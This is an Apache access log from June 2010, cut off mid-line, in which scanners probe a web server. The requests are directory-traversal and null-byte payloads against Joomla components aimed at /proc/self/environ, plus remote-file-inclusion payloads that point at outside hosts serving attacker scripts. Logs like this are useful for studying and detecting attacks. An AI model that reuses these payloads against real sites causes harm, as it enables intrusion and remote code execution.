187.45.193.159 - - [07/Jun/2010:10:06:47 -0500] "GET /index.php?option=com_joomlaflashfun&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
217.16.18.219 - - [07/Jun/2010:10:07:23 -0500] "GET /logs/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
217.16.18.219 - - [07/Jun/2010:10:07:23 -0500] "GET /index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
207.46.199.46 - - [07/Jun/2010:10:13:07 -0500] "GET /logs/access_log.1155686400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
209.188.90.44 - - [07/Jun/2010:10:13:23 -0500] "GET /logs/access_log.1274313600/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
209.188.90.44 - - [07/Jun/2010:10:13:23 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
209.188.90.44 - - [07/Jun/2010:10:13:23 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.834"
209.188.90.44 - - [07/Jun/2010:10:13:24 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
209.188.90.44 - - [07/Jun/2010:10:13:36 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
209.188.90.44 - - [07/Jun/2010:10:14:09 -0500] "GET /logs/access_log.1274313600/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
209.188.90.44 - - [07/Jun/2010:10:14:09 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
209.188.90.44 - - [07/Jun/2010:10:14:09 -0500] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.834"
93.89.215.70 - - [07/Jun/2010:10:17:02 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
93.89.215.70 - - [07/Jun/2010:10:17:22 -0500] "GET /logs/access_log.1274313600/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
93.89.215.70 - - [07/Jun/2010:10:17:22 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
93.89.215.70 - - [07/Jun/2010:10:17:23 -0500] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.805"
207.46.204.192 - - [07/Jun/2010:10:17:35 -0500] "GET /logs/access_log.1257292800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.195.237 - - [07/Jun/2010:10:21:06 -0500] "GET /logs/access_log.1155427200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.253.162.10 - - [07/Jun/2010:10:24:24 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
87.253.162.10 - - [07/Jun/2010:10:24:24 -0500] "GET /logs/access_log.1271548800//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 378 "-""Mozilla/5.0"
87.253.162.10 - - [07/Jun/2010:10:24:24 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
67.212.185.202 - - [07/Jun/2010:10:25:22 -0500] "GET /?option=com_ninjarsssyndicator&controller=http://monkeybusinessinstitute.com/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
67.212.185.202 - - [07/Jun/2010:10:25:22 -0500] "GET /logs/?option=com_ninjarsssyndicator&controller=http://monkeybusinessinstitute.com/Ckrid1.txt?? HTTP/1.1" 200 8566 "-""Mozilla/5.0"
67.212.185.202 - - [07/Jun/2010:10:25:22 -0500] "GET /logs/access_log.1272585600/?option=com_ninjarsssyndicator&controller=http://monkeybusinessinstitute.com/Ckrid1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
67.212.185.202 - - [07/Jun/2010:10:25:23 -0500] "GET /logs/access_log.1272585600/?option=com_ninjarsssyndicator&controller=http://monkeybusinessinstitute.com/Ckrid1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
67.212.185.202 - - [07/Jun/2010:10:25:23 -0500] "GET /logs/?option=com_ninjarsssyndicator&controller=http://monkeybusinessinstitute.com/Ckrid1.txt?? HTTP/1.1" 200 8566 "-""Mozilla/5.0"
67.212.185.202 - - [07/Jun/2010:10:25:23 -0500] "GET /?option=com_ninjarsssyndicator&controller=http://monkeybusinessinstitute.com/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
209.200.240.65 - - [07/Jun/2010:10:25:42 -0500] "GET /?option=com_ninjarsssyndicator&controller=http://monkeybusinessinstitute.com/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
209.200.240.65 - - [07/Jun/2010:10:25:42 -0500] "GET /logs/access_log.1272585600/?option=com_ninjarsssyndicator&controller=http://monkeybusinessinstitute.com/Ckrid1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
209.200.240.65 - - [07/Jun/2010:10:25:42 -0500] "GET /?option=com_ninjarsssyndicator&controller=http://monkeybusinessinstitute.com/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
209.200.240.65 - - [07/Jun/2010:10:25:42 -0500] "GET /logs/?option=com_ninjarsssyndicator&controller=http://monkeybusinessinstitute.com/Ckrid1.txt?? HTTP/1.1" 200 8566 "-""Mozilla/5.0"
209.200.240.65 - - [07/Jun/2010:10:25:42 -0500] "GET /logs/?option=com_ninjarsssyndicator&controller=http://monkeybusinessinstitute.com/Ckrid1.txt?? HTTP/1.1" 200 8566 "-""Mozilla/5.0"
209.200.240.65 - - [07/Jun/2010:10:25:42 -0500] "GET /logs/access_log.1272585600/?option=com_ninjarsssyndicator&controller=http://monkeybusinessinstitute.com/Ckrid1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
87.253.162.10 - - [07/Jun/2010:10:26:00 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
87.253.162.10 - - [07/Jun/2010:10:26:00 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
87.253.162.10 - - [07/Jun/2010:10:26:00 -0500] "GET /logs/access_log.1271548800//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 378 "-""Mozilla/5.0"
67.212.185.202 - - [07/Jun/2010:10:26:54 -0500] "GET /?option=com_ninjarsssyndicator&controller=http://monkeybusinessinstitute.com/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
67.212.185.202 - - [07/Jun/2010:10:26:54 -0500] "GET /logs/?option=com_ninjarsssyndicator&controller=http://monkeybusinessinstitute.com/Ckrid1.txt?? HTTP/1.1" 200 8566 "-""Mozilla/5.0"
67.212.185.202 - - [07/Jun/2010:10:26:54 -0500] "GET /logs/access_log.1272585600/?option=com_ninjarsssyndicator&controller=http://monkeybusinessinstitute.com/Ckrid1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
174.37.143.198 - - [07/Jun/2010:10:26:59 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://seekingtruelove.co.uk/forum/1.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
174.37.143.198 - - [07/Jun/2010:10:26:59 -0500] "GET /logs/access_log.1273363200%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://seekingtruelove.co.uk/forum/1.txt??? HTTP/1.1" 404 338 "-""Mozilla/5.0"
174.37.143.198 - - [07/Jun/2010:10:26:59 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://seekingtruelove.co.uk/forum/1.txt??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
78.110.50.139 - - [07/Jun/2010:10:27:05 -0500] "GET /logs/access_log.1273363200%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://seekingtruelove.co.uk/forum/1.txt??? HTTP/1.1" 404 338 "-""Mozilla/5.0"
78.110.50.139 - - [07/Jun/2010:10:27:05 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://seekingtruelove.co.uk/forum/1.txt??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
78.110.50.139 - - [07/Jun/2010:10:27:05 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://seekingtruelove.co.uk/forum/1.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
201.36.173.93 - - [07/Jun/2010:10:27:06 -0500] "GET /logs/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
209.200.240.65 - - [07/Jun/2010:10:27:06 -0500] "GET /logs/access_log.1272585600/?option=com_ninjarsssyndicator&controller=http://monkeybusinessinstitute.com/Ckrid1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
209.200.240.65 - - [07/Jun/2010:10:27:06 -0500] "GET /logs/?option=com_ninjarsssyndicator&controller=http://monkeybusinessinstitute.com/Ckrid1.txt?? HTTP/1.1" 200 8566 "-""Mozilla/5.0"
209.200.240.65 - - [07/Jun/2010:10:27:06 -0500] "GET /?option=com_ninjarsssyndicator&controller=http://monkeybusinessinstitute.com/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
201.36.173.93 - - [07/Jun/2010:10:27:06 -0500] "GET /index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
67.212.185.202 - - [07/Jun/2010:10:27:08 -0500] "GET /logs/access_log.1272585600/?option=com_ninjarsssyndicator&controller=http://monkeybusinessinstitute.com/Ckrid1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
67.212.185.202 - - [07/Jun/2010:10:27:08 -0500] "GET /logs/?option=com_ninjarsssyndicator&controller=http://monkeybusinessinstitute.com/Ckrid1.txt?? HTTP/1.1" 200 8566 "-""Mozilla/5.0"
67.212.185.202 - - [07/Jun/2010:10:27:08 -0500] "GET /?option=com_ninjarsssyndicator&controller=http://monkeybusinessinstitute.com/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
201.36.173.93 - - [07/Jun/2010:10:27:15 -0500] "GET /logs/access_log.1274832000/index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
201.36.173.93 - - [07/Jun/2010:10:27:16 -0500] "GET /index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
201.36.173.93 - - [07/Jun/2010:10:27:16 -0500] "GET /logs/index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
67.212.185.202 - - [07/Jun/2010:10:27:24 -0500] "GET /logs/access_log.1272585600/?option=com_ninjarsssyndicator&controller=http://monkeybusinessinstitute.com/Ckrid1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
67.212.185.202 - - [07/Jun/2010:10:27:25 -0500] "GET /?option=com_ninjarsssyndicator&controller=http://monkeybusinessinstitute.com/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
67.212.185.202 - - [07/Jun/2010:10:27:25 -0500] "GET /logs/?option=com_ninjarsssyndicator&controller=http://monkeybusinessinstitute.com/Ckrid1.txt?? HTTP/1.1" 200 8566 "-""Mozilla/5.0"
67.212.185.202 - - [07/Jun/2010:10:27:34 -0500] "GET /logs/?option=com_ninjarsssyndicator&controller=http://monkeybusinessinstitute.com/Ckrid1.txt?? HTTP/1.1" 200 8566 "-""Mozilla/5.0"
67.212.185.202 - - [07/Jun/2010:10:27:34 -0500] "GET /?option=com_ninjarsssyndicator&controller=http://monkeybusinessinstitute.com/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
67.212.185.202 - - [07/Jun/2010:10:27:34 -0500] "GET /logs/access_log.1272585600/?option=com_ninjarsssyndicator&controller=http://monkeybusinessinstitute.com/Ckrid1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
67.212.185.202 - - [07/Jun/2010:10:27:37 -0500] "GET /logs/access_log.1272585600/?option=com_ninjarsssyndicator&controller=http://monkeybusinessinstitute.com/Ckrid1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
67.212.185.202 - - [07/Jun/2010:10:27:37 -0500] "GET /logs/?option=com_ninjarsssyndicator&controller=http://monkeybusinessinstitute.com/Ckrid1.txt?? HTTP/1.1" 200 8566 "-""Mozilla/5.0"
67.212.185.202 - - [07/Jun/2010:10:27:38 -0500] "GET /?option=com_ninjarsssyndicator&controller=http://monkeybusinessinstitute.com/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
67.212.185.202 - - [07/Jun/2010:10:27:40 -0500] "GET /?option=com_ninjarsssyndicator&controller=http://monkeybusinessinstitute.com/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
67.212.185.202 - - [07/Jun/2010:10:27:40 -0500] "GET /logs/?option=com_ninjarsssyndicator&controller=http://monkeybusinessinstitute.com/Ckrid1.txt?? HTTP/1.1" 200 8566 "-""Mozilla/5.0"
67.212.185.202 - - [07/Jun/2010:10:27:40 -0500] "GET /logs/access_log.1272585600/?option=com_ninjarsssyndicator&controller=http://monkeybusinessinstitute.com/Ckrid1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
67.212.185.202 - - [07/Jun/2010:10:27:43 -0500] "GET /?option=com_ninjarsssyndicator&controller=http://monkeybusinessinstitute.com/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
67.212.185.202 - - [07/Jun/2010:10:27:43 -0500] "GET /logs/?option=com_ninjarsssyndicator&controller=http://monkeybusinessinstitute.com/Ckrid1.txt?? HTTP/1.1" 200 8566 "-""Mozilla/5.0"
67.212.185.202 - - [07/Jun/2010:10:27:43 -0500] "GET /logs/access_log.1272585600/?option=com_ninjarsssyndicator&controller=http://monkeybusinessinstitute.com/Ckrid1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
78.110.50.139 - - [07/Jun/2010:10:27:51 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://seekingtruelove.co.uk/forum/1.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
78.110.50.139 - - [07/Jun/2010:10:27:51 -0500] "GET /logs/access_log.1271548800//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://seekingtruelove.co.uk/forum/1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
78.110.50.139 - - [07/Jun/2010:10:27:51 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://seekingtruelove.co.uk/forum/1.txt??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
174.37.143.198 - - [07/Jun/2010:10:27:58 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://seekingtruelove.co.uk/forum/1.txt??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
174.37.143.198 - - [07/Jun/2010:10:27:58 -0500] "GET /logs/access_log.1273363200//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://seekingtruelove.co.uk/forum/1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
174.37.143.198 - - [07/Jun/2010:10:27:58 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://seekingtruelove.co.uk/forum/1.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
201.36.173.93 - - [07/Jun/2010:10:28:00 -0500] "GET /logs/index.php?option=com_awdwall&controller../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
201.36.173.93 - - [07/Jun/2010:10:28:02 -0500] "GET /index.php?option=com_awdwall&controller../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
78.110.50.139 - - [07/Jun/2010:10:28:21 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://seekingtruelove.co.uk/forum/1.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
78.110.50.139 - - [07/Jun/2010:10:28:21 -0500] "GET /logs/access_log.1273363200//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://seekingtruelove.co.uk/forum/1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
78.110.50.139 - - [07/Jun/2010:10:28:21 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://seekingtruelove.co.uk/forum/1.txt??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
66.135.61.13 - - [07/Jun/2010:10:28:21 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://seekingtruelove.co.uk/forum/1.txt??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
66.135.61.13 - - [07/Jun/2010:10:28:21 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://seekingtruelove.co.uk/forum/1.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
66.135.61.13 - - [07/Jun/2010:10:28:21 -0500] "GET /logs/access_log.1271548800//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://seekingtruelove.co.uk/forum/1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
66.135.61.13 - - [07/Jun/2010:10:29:25 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://seekingtruelove.co.uk/forum/1.txt??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
66.135.61.13 - - [07/Jun/2010:10:29:25 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://seekingtruelove.co.uk/forum/1.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
66.135.61.13 - - [07/Jun/2010:10:29:26 -0500] "GET /logs/access_log.1273363200//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://seekingtruelove.co.uk/forum/1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
66.135.61.13 - - [07/Jun/2010:10:29:36 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://seekingtruelove.co.uk/forum/1.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
66.135.61.13 - - [07/Jun/2010:10:29:36 -0500] "GET /logs/access_log.1273363200%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://seekingtruelove.co.uk/forum/1.txt??? HTTP/1.1" 404 338 "-""Mozilla/5.0"
66.135.61.13 - - [07/Jun/2010:10:29:36 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://seekingtruelove.co.uk/forum/1.txt??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
174.133.201.194 - - [07/Jun/2010:10:30:07 -0500] "GET /logs/?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.834"
174.133.201.194 - - [07/Jun/2010:10:30:07 -0500] "GET /?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
174.37.143.198 - - [07/Jun/2010:10:31:04 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://seekingtruelove.co.uk/forum/1.txt??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
174.37.143.198 - - [07/Jun/2010:10:31:04 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://seekingtruelove.co.uk/forum/1.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
174.37.143.198 - - [07/Jun/2010:10:31:04 -0500] "GET /logs/access_log.1271548800//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://seekingtruelove.co.uk/forum/1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
209.188.90.44 - - [07/Jun/2010:10:31:55 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
209.188.90.44 - - [07/Jun/2010:10:32:07 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
74.81.68.114 - - [07/Jun/2010:10:32:13 -0500] "GET /logs/?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.805"
74.81.68.114 - - [07/Jun/2010:10:32:14 -0500] "GET /?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
68.166.0.184 - - [07/Jun/2010:10:34:25 -0500] "GET /logs/?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.808"
68.166.0.184 - - [07/Jun/2010:10:34:25 -0500] "GET /?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.808"
190.152.145.54 - - [07/Jun/2010:10:34:48 -0500] "GET /logs/access_log.1270771200/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.ehtsc.co.cu/cidtur//components/com_jcalpro/id1.txt? HTTP/1.1" 404 370 "-""Mozilla/5.0"
190.152.145.54 - - [07/Jun/2010:10:34:48 -0500] "GET /logs/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.ehtsc.co.cu/cidtur//components/com_jcalpro/id1.txt? HTTP/1.1" 404 348 "-""Mozilla/5.0"
190.152.145.54 - - [07/Jun/2010:10:34:48 -0500] "GET /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.ehtsc.co.cu/cidtur//components/com_jcalpro/id1.txt? HTTP/1.1" 404 343 "-""Mozilla/5.0"
118.129.167.25 - - [07/Jun/2010:10:34:57 -0500] "GET //appserv/mani.php?appserv_root=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 301 "-""Mozilla/5.0"
118.129.167.25 - - [07/Jun/2010:10:34:58 -0500] "GET /logs/access_log.1273017600%20%20//appserv/mani.php?appserv_root=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 330 "-""Mozilla/5.0"
118.129.167.25 - - [07/Jun/2010:10:34:58 -0500] "GET /logs//appserv/mani.php?appserv_root=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 306 "-""Mozilla/5.0"
190.152.145.54 - - [07/Jun/2010:10:35:04 -0500] "GET /logs/access_log.1271548800/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.ehtsc.co.cu/cidtur//components/com_jcalpro/id1.txt? HTTP/1.1" 404 370 "-""Mozilla/5.0"
118.129.167.25 - - [07/Jun/2010:10:35:05 -0500] "GET /logs/access_log.1273017600%20%20//appserv/mani.php?appserv_root=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 330 "-""Mozilla/5.0"
118.129.167.25 - - [07/Jun/2010:10:35:05 -0500] "GET //appserv/mani.php?appserv_root=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 301 "-""Mozilla/5.0"
118.129.167.25 - - [07/Jun/2010:10:35:05 -0500] "GET /logs//appserv/mani.php?appserv_root=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 306 "-""Mozilla/5.0"
209.188.90.44 - - [07/Jun/2010:10:36:15 -0500] "GET /logs/access_log.1274832000/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
209.188.90.44 - - [07/Jun/2010:10:36:15 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
209.188.90.44 - - [07/Jun/2010:10:36:15 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.834"
190.152.145.54 - - [07/Jun/2010:10:37:22 -0500] "GET /logs/access_log.1274832000/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.ehtsc.co.cu/cidtur//components/com_jcalpro/id1.txt? HTTP/1.1" 404 370 "-""Mozilla/5.0"
201.36.173.93 - - [07/Jun/2010:10:38:34 -0500] "GET /logs/index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
201.36.173.93 - - [07/Jun/2010:10:38:35 -0500] "GET /index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
201.36.173.93 - - [07/Jun/2010:10:38:45 -0500] "GET /logs/index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
201.36.173.93 - - [07/Jun/2010:10:38:45 -0500] "GET /index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
209.188.90.44 - - [07/Jun/2010:10:39:04 -0500] "GET /logs/access_log.1273363200/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
209.188.90.44 - - [07/Jun/2010:10:39:04 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
209.188.90.44 - - [07/Jun/2010:10:39:08 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.834"
209.188.90.44 - - [07/Jun/2010:10:39:11 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/envir